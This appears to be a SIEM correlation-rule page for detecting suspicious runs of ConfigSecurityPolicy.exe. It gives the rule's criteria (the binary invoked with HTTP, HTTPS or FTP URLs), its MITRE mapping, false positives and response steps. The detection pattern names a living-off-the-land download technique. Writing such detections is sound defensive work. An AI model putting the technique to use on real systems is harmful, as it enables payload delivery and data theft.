Suspicious Execution of ConfigSecurityPolicy

Rule added on 30th April, 2024

Rule type:

Correlation

Rule description:

ConfigSecurityPolicy.exe is a legitimate executable file which is a part of Microsoft's Security Configuration Engine. Its primary functionality is to enforce the security configurations and policies defined by administrators to guard the systems from potential threats.

However, attackers may abuse this for achieving their malicious purposes by exploiting the vulnerabilities or uploading malicious files.

Impact:

It can impact the organizations in the following ways:

  • Execute malicious codes
  • Unexpected downtime and system instability
  • Data exfiltration
  • Disabling security features

Data source:

Windows:

Required configuration: The rules is based on the process creation and termination. Prerequisites required are installing and configuring Sysmon, enabling audit process creation audit policy, and the command line auditing.

Relevant MITRE ATT&CK techniques and tactics:

Tactics: TA0002- Execution

Techniques: T1204- User Execution

Sub Techniques: T1204.002- Malicious File

Criteria:

( ( Process name ends with "ConfigSecurityPolicy.exe" OR Original file name contains "ConfigSecurityPolicy" ) AND ( Command line contains "https://" OR Command line contains "http://" OR Command line contains "ftp://" ) )

"ConfigSecurityPolicy.exe" - This is an executable file that is associated with security policy configuration.

"https://"- This checks for instances where the process attempts to establish a secure connection over HTTPS protocol.

"http://"- This checks for instances where the process attempts to establish a n unsecure connection over HTTP protocol.

"ftp://"- The File Transfer Protocol (FTP) is used for transferring files between systems, indicating a potential exchange of sensitive data

When to enable this rule:

Enabling this rule will help you meet the security standards' requirements listed below:

Security standards (NIST CSF 2.0):

DE.CM-09: Computing hardware and software, runtime environments, and their data are monitored to find potentially adverse events

When this rule is triggered, you're notified when a suspicious ConfigSecurityPolicy.exe file has being executed. This enables you to review access and permissions, take corrective actions, and monitor the use of ConfigSecurityPolicy.

Known false positives: ConfigSecurityPolicy.exe is administrators to manage settings and policies such as download or update Windows Defender. This event may be generated when administrators use it for administrative purposes.

Next steps:

When this alert is triggered, the following measures can be implemented:

  • Identification: Identify the alert as a new incident or within an ongoing incident.
  • Analysis: Analyze the impact and extent of the compromise to comprehend the severity of the attack.
  • Response: Respond promptly by initiating an automated workflow to cease the malicious process.
  • Deploy Access Controls: Implement access controls and permissions to restrict the execution of ConfigSecurityPolicy by unauthorized users or processes